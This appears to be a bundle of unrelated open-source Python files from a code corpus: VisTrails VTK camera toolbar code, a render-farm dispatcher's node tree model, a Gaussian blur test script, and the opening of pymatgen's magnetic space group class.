cup = cam.GetViewUp()
rendererId = cellWidget.renderer_maps[ren]
# Looking for SetActiveCamera()
camera = None
renderer = pipeline.modules[rendererId]
for c in pipeline.connections.values():
if c.destination.moduleId==rendererId:
if c.destination.name=='SetActiveCamera':
camera = pipeline.modules[c.source.moduleId]
break
if not camera:
# Create camera
vtk_package = 'edu.utah.sci.vistrails.vtk'
camera = controller.create_module(vtk_package, 'vtkCamera', '',
0.0, 0.0)
ops.append(('add', camera))
# Connect camera to renderer
camera_conn = controller.create_connection(camera, 'self',
renderer,
'SetActiveCamera')
ops.append(('add', camera_conn))
# update functions
def convert_to_str(arglist):
new_arglist = []
for arg in arglist:
new_arglist.append(str(arg))
return new_arglist
functions = [('SetPosition', convert_to_str(cpos)),
('SetFocalPoint', convert_to_str(cfol)),
('SetViewUp', convert_to_str(cup))]
ops.extend(controller.update_functions_ops(camera, functions))
action = core.db.action.create_action(ops)
controller.add_new_action(action)
controller.perform_action(action)
controller.select_latest_version()
def triggeredSlot(self, checked=False):
""" toggledSlot(checked: boolean) -> None
Execute the action when the button is clicked
"""
visApp = QtCore.QCoreApplication.instance()
if hasattr(visApp, 'builderWindow'):
builderWindow = visApp.builderWindow
if builderWindow:
info = self.toolBar.sheet.getCellPipelineInfo(
self.toolBar.row, self.toolBar.col)
if info:
info = info[0]
viewManager = builderWindow.viewManager
view = viewManager.ensureVistrail(info['locator'])
if view:
controller = view.controller
controller.change_selected_version(info['version'])
self.setCamera(controller)
class QVTKViewWidgetToolBar(QCellToolBar):
"""
QVTKViewWidgetToolBar derives from QCellToolBar to give the VTKViewCell
a customizable toolbar
"""
def createToolBar(self):
""" createToolBar() -> None
This will get called initially to add customizable widgets
"""
self.appendAction(QVTKViewWidgetCapture(self))
self.addAnimationButtons()
self.appendAction(QVTKViewWidgetSaveCamera(self))
def registerSelf():
""" registerSelf() -> None
Register the module with the registry
"""
identifier = 'edu.utah.sci.vistrails.vtk'
registry = get_module_registry()
registry.add_module(VTKViewCell)
registry.add_input_port(VTKViewCell, "Location", CellLocation)
import core.debug
for (port,module) in [("SetRenderView",'vtkRenderView')]:
try:
registry.add_input_port(VTKViewCell, port,'(%s:%s)'%(identifier,module))
except Exception, e:
core.debug.warning(str(e))
registry.add_output_port(VTKViewCell, "self", VTKViewCell)
|
CMUSV-VisTrails/WorkflowRecommendation
|
vistrails/packages/vtk/vtkviewcell.py
|
Python
|
bsd-3-clause
| 39,509
|
[
"VTK"
] |
be43547bc1db115c2af2ec8743bd0a6874e4f152b72b1784248053f3ee730c3b
|
from time import time
from collections import defaultdict
from weakref import WeakKeyDictionary
from octopus.dispatcher.model.enums import *
from octopus.dispatcher.model import Task
from . import models
import logging
LOGGER = logging.getLogger("main.dispatcher.dispatchtree")
class NoRenderNodeAvailable(BaseException):
'''Raised to interrupt the dispatch iteration on an entry point node.'''
class NoLicenseAvailableForTask(BaseException):
'''Raised to interrupt the dispatch iteration on an entry point node.'''
class DependencyListField(models.Field):
def to_json(self, node):
return [[dep.id, statusList] for (dep, statusList) in node.dependencies]
class PoolShareDictField(models.Field):
def to_json(self, instance):
return [[poolShare.id, poolShare.pool.name] for poolShare in instance.poolShares.values()]
class AdditionnalPoolShareDictField(models.Field):
def to_json(self, instance):
return [[ps.id, ps.pool.name] for ps in instance.additionnalPoolShares.values()]
class FolderNodeChildrenField(models.Field):
def to_json(self, instance):
return [child.id for child in instance.children]
class BaseNode(models.Model):
dispatcher = None
name = models.StringField()
parent = models.ModelField(allow_null=True)
user = models.StringField()
priority = models.IntegerField()
dispatchKey = models.FloatField()
maxRN = models.IntegerField()
updateTime = models.FloatField()
poolShares = PoolShareDictField()
additionnalPoolShares = AdditionnalPoolShareDictField()
completion = models.FloatField()
status = models.IntegerField()
creationTime = models.FloatField()
startTime = models.FloatField(allow_null=True)
updateTime = models.FloatField(allow_null=True)
endTime = models.FloatField(allow_null=True)
dependencies = DependencyListField()
averageTimeByFrame = models.FloatField(allow_null=True)
minTimeByFrame = models.FloatField(allow_null=True)
maxTimeByFrame = models.FloatField(allow_null=True)
timer = models.FloatField(allow_null=True)
@property
def tags(self):
return {}
def __init__(self, id, name, parent, user, priority, dispatchKey, maxRN,
creationTime=None, startTime=None,
updateTime=None, endTime=None,
status=NODE_READY):
'''
Base class for each node in dispatcher tree structure. Holds main model
fields.
:param id int: unique id for this node
:param name str: a short string describing this node
:param parent: a FolderNode or None if this node is a root node
:param priority int: priority value
:param dispatchKey int: dispatchKey value
:param maxRN int: maximum number of render nodes that can be allocated to this tree node
:param creationTime: timestamp indicating when the node was created
:param startTime: timestamp indicating when the node was started
:param updateTime: timestamp indicating when the node was updated
:param endTime: timestamp indicating when the node was ended
:param status int: current node's status
'''
if not self.dispatcher:
from octopus.dispatcher.dispatcher import Dispatcher
self.dispatcher = Dispatcher(None)
self.__dict__['parent'] = None
models.Model.__init__(self)
self.id = int(id) if id is not None else None
self.name = str(name)
self.parent = parent
self.user = str(user)
self.priority = int(priority)
self.dispatchKey = int(dispatchKey)
self.maxRN = int(maxRN)
self.optimalMaxRN = 0
self.allocatedRN = 0
self.poolShares = WeakKeyDictionary()
self.additionnalPoolShares = WeakKeyDictionary()
self.completion = 1.0
self.status = status
self.creationTime = time() if not creationTime else creationTime
self.startTime = startTime
self.updateTime = updateTime
self.endTime = endTime
self.dependencies = []
self.reverseDependencies = []
self.lastDependenciesSatisfaction = False
self.lastDependenciesSatisfactionDispatchCycle = -1
self.readyCommandCount = 0
self.doneCommandCount = 0
self.commandCount = 0
self.averageTimeByFrameList = []
self.averageTimeByFrame = 0.0
self.minTimeByFrame = 0.0
self.maxTimeByFrame = 0.0
self.timer = None
def mainPoolShare(self):
return self.poolShares.values()[0]
def mainPool(self):
return self.poolShares.keys()[0]
def to_json(self):
base = super(BaseNode, self).to_json()
base["allocatedRN"] = self.allocatedRN
base["optimalMaxRN"] = self.optimalMaxRN
base["tags"] = self.tags.copy()
base["readyCommandCount"] = self.readyCommandCount
base["doneCommandCount"] = self.doneCommandCount
base["commandCount"] = self.commandCount
return base
def addDependency(self, node, acceptedStatus):
# TODO dependencies should be set for restricted node statuses only: DONE, ERROR and CANCELED
if not acceptedStatus:
return
if self is node:
# skip dependencies on oneself
return
self.status = NODE_BLOCKED
val = [node, acceptedStatus]
if not val in self.dependencies:
self.dependencies.append(val)
if self not in node.reverseDependencies:
node.reverseDependencies.append(self)
def checkDependenciesSatisfaction(self):
# TODO dependencies should be set for restricted node statuses only: DONE, ERROR and CANCELED
if self.dispatcher.cycle == self.lastDependenciesSatisfactionDispatchCycle:
return self.lastDependenciesSatisfaction
self.lastDependenciesSatisfaction = True
self.lastDependenciesSatisfactionDispatchCycle = self.dispatcher.cycle
for node, acceptedStatus in self.dependencies:
if node.status not in acceptedStatus:
self.lastDependenciesSatisfaction = False
break
else:
if self.parent is not None:
self.lastDependenciesSatisfaction = self.parent.checkDependenciesSatisfaction()
return self.lastDependenciesSatisfaction
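# Sketch of how the two methods above fit together (node names illustrative):
# nodeB.addDependency(nodeA, [NODE_DONE]) puts nodeB in NODE_BLOCKED until
# checkDependenciesSatisfaction() sees nodeA reach one of the accepted
# statuses; the result is memoized per dispatcher cycle through
# lastDependenciesSatisfactionDispatchCycle.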
def __new__(cls, *args, **kwargs):
# Remove optional attributes for the __new__ call (not supported); the attributes are still transmitted via the super hierarchy
obj = super(BaseNode, cls).__new__(cls)
obj._parent_value = None
obj.invalidated = True
return obj
def __setattr__(self, name, value):
if name == 'parent':
self.setParentValue(value)
super(BaseNode, self).__setattr__(name, value)
def setParentValue(self, parent):
if self.parent is parent:
return
if self.parent:
self.parent.removeChild(self, False)
if parent:
parent.addChild(self, False)
self.__dict__['parent'] = parent
def dispatchIterator(self):
raise NotImplementedError
def updateAllocation(self):
'''
Called by subclasses during updateCompletion process to store maxRN and allocatedRN in the node.
maxRN is also updated via the webservice on user requests; this is a bit of a redefinition since it shouldn't change programmatically.
'''
# Need to iterate over all poolshares concerning the current node.
# Otherwise we only update the allocatedRN of the current pool (not the right value when the user has changed pool during render)
# nodeSharesList = [poolshare for poolshare in self.dispatcher.dispatchTree.poolShares.values() if poolshare.node.id == self.id and poolshare.node.status in [NODE_RUNNING, NODE_ERROR, NODE_PAUSED] ]
# self.allocatedRN = 0
# for currPoolShare in nodeSharesList:
# self.maxRN = currPoolShare.maxRN
# self.allocatedRN += currPoolShare.allocatedRN
# Correct way, iterate over active poolshare and additionnal poolshares only
self.allocatedRN = 0
for currPoolShare in self.poolShares.values():
self.maxRN = currPoolShare.maxRN
self.allocatedRN += currPoolShare.allocatedRN
for ps in self.additionnalPoolShares.values():
self.allocatedRN += ps.allocatedRN
def updateCompletionAndStatus(self):
raise NotImplementedError
def __repr__(self):
nodes = [self]
parent = self.parent
while parent is not None:
nodes.insert(0, parent)
parent = parent.parent
names = [node.name for node in nodes]
return "<Node name='%s' path='/%s'>" % (self.name, "/".join(names))
def __str__(self):
return "%s: maxRN=%d allocatedRN=%d" % (self.name, self.maxRN, self.allocatedRN)
parent_value = property(lambda self: self._parent_value, setParentValue)
def invalidate(self):
self.invalidated = True
while self.parent and not self.parent.invalidated:
self.parent.invalidated = True
self = self.parent
class FolderNode(BaseNode):
strategy = models.StrategyField()
taskGroup = models.ModelField(allow_null=True)
children = FolderNodeChildrenField()
@property
def tags(self):
return self.taskGroup.tags if self.taskGroup else {}
##
# @param id an integer, unique for this node
# @param name a short string describing this folder
# @param parent a FolderNode or None if this node is a root node
# @param priority an integer priority value
# @param dispatchKey a floating-point dispatchKey value
# @param maxRN an integer value representing the maximum number of render
# nodes that can be allocated to this tree node.
# @param strategy a DispatchStrategy object
#
def __init__(self, id, name, parent, user, priority, dispatchKey, maxRN, strategy, creationTime=None, startTime=None, updateTime=None, endTime=None, status=NODE_DONE, taskGroup=None):
BaseNode.__init__(self, id, name, parent, user, priority, dispatchKey, maxRN, creationTime, startTime, updateTime, endTime, status)
self.children = []
self.strategy = strategy
self.taskGroup = taskGroup
if taskGroup is not None:
self.timer = taskGroup.timer
def addChild(self, child, setParent=True):
if child.parent is not self and setParent:
child.parent = self
else:
self.children.append(child)
self.fireChildAddedEvent(child)
def removeChild(self, child, setParent=True):
if child.parent is self and setParent:
child.parent = None
else:
self.children.remove(child)
self.fireChildRemovedEvent(child)
def fireChildAddedEvent(self, child):
self.invalidate()
for l in self.changeListeners:
try:
l.onChildAddedEvent(self, child)
except AttributeError:
pass
def fireChildRemovedEvent(self, child):
self.invalidate()
for l in self.changeListeners:
try:
l.onChildRemovedEvent(self, child)
except AttributeError:
pass
def cmdIterator(self):
for child in self.children:
for command in child.cmdIterator():
yield command
# if pCascadeUpdate:
# for dependingNode in self.reverseDependencies:
# dependingNode.setStatus( pStatus, pCascadeUpdate )
# for child in self.children:
# child.setStatus(pStatus, pCascadeUpdate)
# self.status = pStatus
# return True
##
# @return yields (node, command) tuples
#
def dispatchIterator(self, stopFunc, ep=None):
if ep is None:
ep = self
if self.readyCommandCount == 0:
return
self.strategy.update(self, ep)
for child in self.children:
try:
# PRA: only the TaskNode.dispatchIterator() may raise NoRenderNodeAvailable or NoLicenseAvailableForTask
for assignment in child.dispatchIterator(stopFunc, ep):
node, command = assignment
self.strategy.on_assignment(self, child, node)
yield assignment
# If no render node available for a command, all the commands of the parent tasks will not find a RN
except NoRenderNodeAvailable:
return
# Lack of licence is specific to a command, so we continue to iterate through the graph
except NoLicenseAvailableForTask:
LOGGER.info("Missing license for node \"%s\" (other commands can start anyway)." % self.name)
continue
# We should stop if stopFunction is reached
if stopFunc():
return
def updateCompletionAndStatus(self):
"""
Evaluate new value for completion and status of a particular FolderNode
"""
self.updateAllocation()
if not self.invalidated:
return
if not self.children:
completion = 1.0
status = NODE_DONE
else:
# Getting completion info
self.readyCommandCount = 0
self.doneCommandCount = 0
self.commandCount = 0
completion = 0.0
status = defaultdict(int)
for child in self.children:
child.updateCompletionAndStatus()
completion += child.completion
status[child.status] += 1
self.readyCommandCount += child.readyCommandCount
self.doneCommandCount += child.doneCommandCount
self.commandCount += child.commandCount
if hasattr(self, "commandCount") and int(self.commandCount) != 0:
self.completion = self.doneCommandCount / float(self.commandCount)
else:
# LOGGER.warning("Warning: a folder node without \"commandCount\" value was found -> %s" % self.name )
self.completion = completion / len(self.children)
# Updating node's overall status
if NODE_PAUSED in status:
self.status = NODE_PAUSED
elif NODE_ERROR in status:
self.status = NODE_ERROR
elif NODE_RUNNING in status:
self.status = NODE_RUNNING
elif NODE_READY in status:
self.status = NODE_READY
elif NODE_BLOCKED in status:
self.status = NODE_BLOCKED
elif NODE_CANCELED in status:
self.status = NODE_CANCELED
else:
# all commands are DONE, ensure the completion is at 1.0 (in case of failed completion update from some workers)
self.completion = 1.0
self.status = NODE_DONE
# Updating timers
times = [childNode.creationTime for childNode in self.children if childNode.creationTime is not None]
if times:
self.creationTime = min(times)
if self.taskGroup and (self.taskGroup.creationTime is None or self.taskGroup.creationTime > self.creationTime):
self.taskGroup.creationTime = self.creationTime
times = [childNode.startTime for childNode in self.children if childNode.startTime is not None]
if times:
self.startTime = min(times)
if self.taskGroup and (self.taskGroup.startTime is None or self.taskGroup.startTime > self.startTime):
self.taskGroup.startTime = self.startTime
times = [childNode.updateTime for childNode in self.children if childNode.updateTime is not None]
if times:
self.updateTime = max(times)
if self.taskGroup and (self.taskGroup.updateTime is None or self.taskGroup.updateTime > self.updateTime):
self.taskGroup.updateTime = self.updateTime
if isFinalNodeStatus(self.status):
times = [childNode.endTime for childNode in self.children if childNode.endTime is not None]
if times:
self.endTime = max(times)
if self.taskGroup and (self.taskGroup.endTime is None or
self.taskGroup.endTime > self.endTime):
self.taskGroup.endTime = self.endTime
else:
self.endTime = None
if self.taskGroup:
self.taskGroup.endTime = None
self.invalidated = False
if self.taskGroup:
self.timer = self.taskGroup.timer
# FIXME: suboptimal... lazy update someday ?
self.taskGroup.updateStatusAndCompletion()
def setPaused(self, paused):
for child in self.children:
child.setPaused(paused)
def resetCompletion(self):
self.completion = 0
for child in self.children:
child.resetCompletion()
def setStatus(self, pStatus, pCascadeUpdate=False):
'''
| Propagates a target status update request.
| @see doc/design/node-status-update.txt
:param pStatus: New status value to assign to the current node
:param pCascadeUpdate: Flag indicating if the depending nodes need to be updated in cascade
'''
if pCascadeUpdate:
for dependingNode in self.reverseDependencies:
dependingNode.setStatus(pStatus, pCascadeUpdate)
for child in self.children:
child.setStatus(pStatus, pCascadeUpdate)
self.status = pStatus
return True
def setMaxAttempt(self, maxAttempt):
'''
Propagate a new maxAttempt value to every child node and report whether the update succeeded for all of them.
'''
globalResult = True
for child in self.children:
res = child.setMaxAttempt(maxAttempt)
if res is False:
globalResult = False
self.dispatcher.dispatchTree.toModifyElements.append(self)
return globalResult
class TaskNode(BaseNode):
task = models.ModelField()
paused = models.BooleanField()
maxAttempt = models.IntegerField()
@property
def tags(self):
if self.task is not None:
return self.task.tags
return None
def __init__(self, id, name, parent, user, priority, dispatchKey, maxRN, task, creationTime=None, startTime=None, updateTime=None, endTime=None, status=NODE_BLOCKED, paused=False, maxAttempt=1):
'''
:param id: an integer, unique for this node
:param name: a short string describing this folder
:param parent: a FolderNode or None if this node is a root node
:param priority: an integer priority value
:param dispatchKey: a floating-point dispatchKey value
:param maxRN: an integer value representing the maximum number of render
nodes that can be allocated to this tree node.
:param task: a Task object
'''
BaseNode.__init__(self, id, name, parent, user, priority, dispatchKey, maxRN, creationTime, startTime, updateTime, endTime, status)
self.task = task
self.paused = paused
self.maxAttempt = int(maxAttempt)
self.commandCount = 0
if task is not None:
self.timer = task.timer
self.maxAttempt = int(task.maxAttempt)
self.commandCount = len(task.commands)
def cmdIterator(self):
for command in self.task.commands:
yield command
def dispatchIterator(self, stopFunc, ep=None):
# PRA : we don't use the stop function here ...
if ep is None:
ep = self
# Return if no readyCommand or job in pause
if self.readyCommandCount == 0:
return
if self.paused:
return
# ensure we are treating the commands in the order they arrived
self.task.commands.sort(key=lambda x: x.id)
for command in self.task.commands:
if command.status != CMD_READY:
continue
# PRA : search a render node to assign command
renderNode = self.reserve_rendernode(command, ep)
# PRA : renderNode is None if we did not find a RN that matches the job constraints
if not renderNode:
# PRA : Requirements depend on the task (and not on the command)
# So if we don't find a RN for one command, we will not find one for the other commands related to the same task
return
# Decrease the number of ready commands through the hierarchy
self.readyCommandCount -= 1
tmp_ep = ep
while tmp_ep:
tmp_ep.readyCommandCount -= 1
tmp_ep = tmp_ep.parent
yield (renderNode, command)
def reserve_rendernode(self, command, ep):
'''
:param command:
:returns: renderNode assigned to command
None if no RNs found due to constraints
'''
if ep is None:
ep = self
for poolshare in [poolShare for poolShare in ep.poolShares.values() if poolShare.hasRenderNodesAvailable()]:
# first, sort the rendernodes according their performance value
rnList = sorted(poolshare.pool.renderNodes, key=lambda rn: rn.performance, reverse=True)
for rendernode in rnList:
if rendernode.isAvailable() and rendernode.canRun(command):
if rendernode.reserveLicense(command, self.dispatcher.licenseManager):
rendernode.addAssignment(command)
return rendernode
else:
raise NoLicenseAvailableForTask
# Might not be necessary anymore because the first loop is based on poolShare's hasRenderNodesAvailable method
# It was not taking into account the tests done before assignment: RN.canRun()
if not [poolShare for poolShare in ep.poolShares.values() if poolShare.hasRenderNodesAvailable()]:
raise NoRenderNodeAvailable
return None
def updateCompletionAndStatus(self):
'''
Evaluate new value for completion and status of a particular TaskNode
'''
self.updateAllocation()
if not self.invalidated:
return
if self.task is None:
self.status = NODE_CANCELED
return
completion = 0.0
status = defaultdict(int)
self.readyCommandCount = 0
self.doneCommandCount = 0
self.commandCount = len(self.task.commands)
for command in self.task.commands:
completion += command.completion
status[command.status] += 1
if command.status == CMD_READY:
self.readyCommandCount += 1
if command.status == CMD_DONE:
self.doneCommandCount += 1
if self.task.commands:
self.completion = completion / len(self.task.commands)
else:
self.completion = 1.0
if CMD_CANCELED in status:
self.status = NODE_CANCELED
elif self.paused:
self.status = NODE_PAUSED
elif CMD_ERROR in status:
self.status = NODE_ERROR
elif CMD_TIMEOUT in status:
self.status = NODE_ERROR
elif CMD_RUNNING in status:
self.status = NODE_RUNNING
elif CMD_ASSIGNED in status:
self.status = NODE_READY
elif CMD_FINISHING in status:
self.status = NODE_RUNNING
elif CMD_READY in status:
self.status = NODE_READY
elif CMD_BLOCKED in status:
self.status = NODE_BLOCKED
else:
# all commands are DONE, ensure the completion is at 1.0 (in case of failed completion update from some workers)
self.completion = 1.0
self.status = NODE_DONE
times = [command.creationTime for command in self.task.commands if command.creationTime is not None]
if times:
self.creationTime = min(times)
times = [command.startTime for command in self.task.commands if command.startTime is not None]
if times:
self.startTime = min(times)
times = [command.updateTime for command in self.task.commands if command.updateTime is not None]
if times:
self.updateTime = max(times)
# only set the endTime on the node if it's done
if self.status == NODE_DONE:
times = [command.endTime for command in self.task.commands if command.endTime is not None]
if times:
self.endTime = max(times)
else:
self.endTime = None
self.task.status = self.status
self.task.completion = self.completion
self.task.creationTime = self.creationTime
self.task.startTime = self.startTime
self.task.updateTime = self.updateTime
self.task.endTime = self.endTime
self.timer = self.task.timer
self.invalidated = False
def checkDependenciesSatisfaction(self):
# TODO dependencies should be set for restricted node statuses only: DONE, ERROR and CANCELED
taskNodes = [taskNode
for taskNode in self.dispatcher.dispatchTree.nodes.values()
if isinstance(taskNode, TaskNode) and taskNode.task == self.task]
return all(BaseNode.checkDependenciesSatisfaction(taskNode) for taskNode in taskNodes)
def setPaused(self, paused):
# pause every job not done
if self.status != NODE_DONE:
self.paused = paused
if self.status == NODE_PAUSED and not paused:
self.status = NODE_READY
self.invalidate()
def setMaxAttempt(self, maxAttempt):
'''
Update the maxAttempt value on this node and on its associated task.
'''
if not isinstance(self.task, Task):
return False
# Update node's task if exists
self.task.maxAttempt = maxAttempt
# Update node
self.maxAttempt = maxAttempt
self.dispatcher.dispatchTree.toModifyElements.append(self.task)
self.dispatcher.dispatchTree.toModifyElements.append(self)
return True
def resetCompletion(self):
self.completion = 0
for command in self.task.commands:
command.completion = 0
def setStatus(self, pStatus, pCascadeUpdate=False):
'''
| Update commands in order to reach the required status.
| If proper param is given, depending node will receive the same status.
:param pStatus: New status value to assign to the current node
:param pCascadeUpdate: Flag indicating if the depending node need to be updated in cascade
'''
if pCascadeUpdate:
for dependingNode in self.reverseDependencies:
dependingNode.setStatus(pStatus, pCascadeUpdate)
if pStatus == NODE_CANCELED and self.status != NODE_DONE:
for command in self.task.commands:
command.cancel()
elif pStatus == NODE_READY and self.status != NODE_RUNNING:
if any(isRunningStatus(command.status) for command in self.task.commands):
return False
for command in self.task.commands:
command.setReadyStatus()
elif pStatus in (NODE_DONE, NODE_ERROR, NODE_BLOCKED, NODE_RUNNING):
return False
return True
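# --- Editor's illustrative sketch (not part of the dispatcher) ---------------
# A minimal, self-contained restatement of the status-aggregation rule used in
# FolderNode.updateCompletionAndStatus above: a folder adopts the highest
# priority status found among its children (PAUSED > ERROR > RUNNING > READY >
# BLOCKED > CANCELED) and only reports DONE when no child reports any of those.
# The NODE_* constants are the ones already used throughout this module.
def _example_aggregate_status(child_statuses):
    for status in (NODE_PAUSED, NODE_ERROR, NODE_RUNNING, NODE_READY,
                   NODE_BLOCKED, NODE_CANCELED):
        if status in child_statuses:
            return status
    return NODE_DONE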
|
mikrosimage/OpenRenderManagement
|
src/octopus/dispatcher/model/node.py
|
Python
|
bsd-3-clause
| 27,782
|
[
"Octopus"
] |
04d55b91a41018adb7a97b0c0a384bea7eab08b3418c2e142afebb15a18fda82
|
#! /usr/bin/env python
import cv2
import numpy as np
import matplotlib.pyplot as plt
import time
from image_processor import *
print (TCOLORS.PURPLE + "Unit Test: Applying a Gaussian Blur to an image" + TCOLORS.NORMAL)
SIGMA = 1
ENVELOPE_SIZE = 5
img = cv2.imread(FILENAME)
gray = rgb2gray(img)
width = len(gray)
height = len(gray[0])
print "Image Width: %d Image Height: %d" % (len(gray), len(gray[0]))
print "Sigma: %d" % SIGMA
print "Envelope Size: %d" % ENVELOPE_SIZE
print "Generating Gaussian Envelope...",
start_time = time.time()
gaussian_envelope = gen_deviation_array(SIGMA, ENVELOPE_SIZE)
elapsed_time = time.time() - start_time
print "Done: Elapsed Time: %.3f" % elapsed_time
print "Gaussian Envelope: %s" % str(gaussian_envelope)
print "Using Open CV to apply gaussian blur...",
start_time = time.time()
blur = cv2.GaussianBlur(gray,(SIGMA,SIGMA),0)
elapsed_time = time.time() - start_time
print "Done: Elapsed Time: %.3f" % elapsed_time
print "Using custom algorithm to apply gaussian blur...",
start_time = time.time()
gaussian_blure = two_d_gaussian_blure(gray, gaussian_envelope)
elapsed_time = time.time() - start_time
print "Done: Elapsed Time: %.3f" % elapsed_time
fig = plt.figure()
a=fig.add_subplot(1,3,1)
plt.title("Original")
plt.imshow(gray, cmap='Greys_r')
a=fig.add_subplot(1,3,2)
plt.title("Opencv Gaussian Blur")
plt.imshow(blur, cmap='Greys_r')
a=fig.add_subplot(1,3,3)
plt.title("Gaussian Blur")
plt.imshow(gaussian_blure, cmap='Greys_r')
plt.show()
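# --- Editor's illustrative sketch --------------------------------------------
# A self-contained NumPy-only way to build a normalised 1-D Gaussian envelope
# and apply it as a separable blur; it is independent of gen_deviation_array /
# two_d_gaussian_blure from the local image_processor module, whose internals
# are not assumed here.
def example_gaussian_kernel(sigma, size):
    x = np.arange(size) - (size - 1) / 2.0
    kernel = np.exp(-x ** 2 / (2.0 * sigma ** 2))
    return kernel / kernel.sum()

def example_separable_blur(image, sigma, size):
    k = example_gaussian_kernel(sigma, size)
    rows = np.apply_along_axis(lambda r: np.convolve(r, k, mode='same'), 1, image)
    return np.apply_along_axis(lambda c: np.convolve(c, k, mode='same'), 0, rows)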
|
CospanDesign/python
|
image_processor/gaussian_image_test.py
|
Python
|
mit
| 1,500
|
[
"Gaussian"
] |
7e841ddde03b30a1c56e8bdaccda8013a35af7b1b47ac27c8a160ef63289a52c
|
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
Magnetic space groups.
"""
import os
import sqlite3
import textwrap
from array import array
from fractions import Fraction
import numpy as np
from monty.design_patterns import cached_class
from pymatgen.core.operations import MagSymmOp
from pymatgen.electronic_structure.core import Magmom
from pymatgen.symmetry.groups import SymmetryGroup, in_array_list
from pymatgen.symmetry.settings import JonesFaithfulTransformation
from pymatgen.util.string import transformation_to_string
__author__ = "Matthew Horton, Shyue Ping Ong"
MAGSYMM_DATA = os.path.join(os.path.dirname(__file__), "symm_data_magnetic.sqlite")
@cached_class
class MagneticSpaceGroup(SymmetryGroup):
"""
Representation of a magnetic space group.
"""
def __init__(self, id, setting_transformation="a,b,c;0,0,0"):
"""
Initializes a MagneticSpaceGroup from its Belov, Neronova and
Smirnova (BNS) number supplied as a list or its label supplied
as a string. To create a magnetic structure in pymatgen, the
Structure.from_magnetic_spacegroup() method can be used, which
relies on this class.
The main difference between magnetic space groups and normal
crystallographic space groups is the inclusion of a time reversal
operator that acts on an atom's magnetic moment. This is
indicated by a prime symbol (') next to the respective symmetry
operation in its label, e.g. the standard crystallographic
space group Pnma has magnetic subgroups Pn'ma, Pnm'a, Pnma',
Pn'm'a, Pnm'a', Pn'ma', Pn'm'a'.
The magnetic space groups are classified as one of 4 types
where G = magnetic space group, and F = parent crystallographic
space group:
1. G=F no time reversal, i.e. the same as corresponding
crystallographic group
2. G=F+F1', "grey" groups, where avg. magnetic moment is zero,
e.g. a paramagnet in zero ext. mag. field
3. G=D+(F-D)1', where D is an equi-translation subgroup of F of
index 2, lattice translations do not include time reversal
4. G=D+(F-D)1', where D is an equi-class subgroup of F of index 2
There are two common settings for magnetic space groups, BNS
and OG. In case 4, the BNS setting != OG setting, and so a
transformation to go between the two settings is required:
specifically, the BNS setting is derived from D, and the OG
setting is derived from F.
This means that the OG setting refers to the unit cell if magnetic
order is neglected, and requires multiple unit cells to reproduce
the full crystal periodicity when magnetic moments are present.
This does not make the OG setting, in general, useful for
electronic structure calculations and the BNS setting is preferred.
However, this class does contain information on the OG setting and
can be initialized from OG labels or numbers if required.
Conventions: ITC monoclinic unique axis b, monoclinic cell choice 1,
hexagonal axis for trigonal groups, origin choice 2 for groups with
more than one origin choice (ISO-MAG).
Raw data comes from ISO-MAG, ISOTROPY Software Suite, iso.byu.edu
http://stokes.byu.edu/iso/magnetic_data.txt
with kind permission from Professor Branton Campbell, BYU
Data originally compiled from:
(1) Daniel B. Litvin, Magnetic Group Tables (International Union
of Crystallography, 2013) www.iucr.org/publ/978-0-9553602-2-0.
(2) C. J. Bradley and A. P. Cracknell, The Mathematical Theory of
Symmetry in Solids (Clarendon Press, Oxford, 1972).
See http://stokes.byu.edu/iso/magneticspacegroupshelp.php for more
information on magnetic symmetry.
:param id: BNS number supplied as list of 2 ints or BNS label as
str or index as int (1-1651) to iterate over all space groups"""
self._data = {}
# Datafile is stored as sqlite3 database since (a) it can be easily
# queried for various different indexes (BNS/OG number/labels) and (b)
# allows binary data to be stored in a compact form similar to that in
# the source data file, significantly reducing file size.
# Note that a human-readable JSON format was tested first but was 20x
# larger and required *much* longer initial loading times.
# retrieve raw data
db = sqlite3.connect(MAGSYMM_DATA)
c = db.cursor()
if isinstance(id, str):
id = "".join(id.split()) # remove any white space
c.execute("SELECT * FROM space_groups WHERE BNS_label=?;", (id,))
elif isinstance(id, list):
c.execute("SELECT * FROM space_groups WHERE BNS1=? AND BNS2=?;", (id[0], id[1]))
elif isinstance(id, int):
# OG3 index is a 'master' index, going from 1 to 1651
c.execute("SELECT * FROM space_groups WHERE OG3=?;", (id,))
raw_data = list(c.fetchone())
# Jones Faithful transformation
self.jf = JonesFaithfulTransformation.from_transformation_string("a,b,c;0,0,0")
if isinstance(setting_transformation, str):
if setting_transformation != "a,b,c;0,0,0":
self.jf = JonesFaithfulTransformation.from_transformation_string(setting_transformation)
elif isinstance(setting_transformation, JonesFaithfulTransformation):
if setting_transformation != self.jf:
self.jf = setting_transformation
self._data["magtype"] = raw_data[0] # int from 1 to 4
self._data["bns_number"] = [raw_data[1], raw_data[2]]
self._data["bns_label"] = raw_data[3]
self._data["og_number"] = [raw_data[4], raw_data[5], raw_data[6]]
self._data["og_label"] = raw_data[7] # can differ from BNS_label
def _get_point_operator(idx):
"""Retrieve information on point operator (rotation matrix and Seitz label)."""
hex = self._data["bns_number"][0] >= 143 and self._data["bns_number"][0] <= 194
c.execute(
"SELECT symbol, matrix FROM point_operators WHERE idx=? AND hex=?;",
(idx - 1, hex),
)
op = c.fetchone()
op = {
"symbol": op[0],
"matrix": np.array(op[1].split(","), dtype="f").reshape(3, 3),
}
return op
def _parse_operators(b):
"""Parses compact binary representation into list of MagSymmOps."""
if len(b) == 0: # e.g. if magtype != 4, OG setting == BNS setting, and b == [] for OG symmops
return None
raw_symops = [b[i : i + 6] for i in range(0, len(b), 6)]
symops = []
for r in raw_symops:
point_operator = _get_point_operator(r[0])
translation_vec = [r[1] / r[4], r[2] / r[4], r[3] / r[4]]
time_reversal = r[5]
op = MagSymmOp.from_rotation_and_translation_and_time_reversal(
rotation_matrix=point_operator["matrix"],
translation_vec=translation_vec,
time_reversal=time_reversal,
)
# store string representation, e.g. (2x|1/2,1/2,1/2)'
seitz = "({}|{},{},{})".format(
point_operator["symbol"],
Fraction(translation_vec[0]),
Fraction(translation_vec[1]),
Fraction(translation_vec[2]),
)
if time_reversal == -1:
seitz += "'"
symops.append({"op": op, "str": seitz})
return symops
def _parse_wyckoff(b):
"""Parses compact binary representation into list of Wyckoff sites."""
if len(b) == 0:
return None
wyckoff_sites = []
def get_label(idx):
if idx <= 25:
return chr(97 + idx) # returns a-z when idx 0-25
return "alpha" # when a-z labels exhausted, use alpha, only relevant for a few space groups
o = 0 # offset
n = 1 # nth Wyckoff site
num_wyckoff = b[0]
